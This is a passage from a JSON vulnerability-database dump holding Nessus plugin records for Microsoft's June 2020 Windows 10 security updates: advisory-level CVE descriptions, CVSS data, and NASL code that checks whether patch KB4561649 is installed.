system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561649: Windows 10 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561649.NASL", "href": "https://www.tenable.com/plugins/nessus/137261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137261);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1234\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561649\");\n script_xref(name:\"MSFT\", value:\"MS20-4561649\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561649: Windows 10 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1334)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. 
(CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. 
The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. 
The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561649/windows-10-update-kb4561649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?111cb6a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561649.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561649'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561649])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:09", "description": "The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses 
the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. 
(CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. 
An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. 
The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, 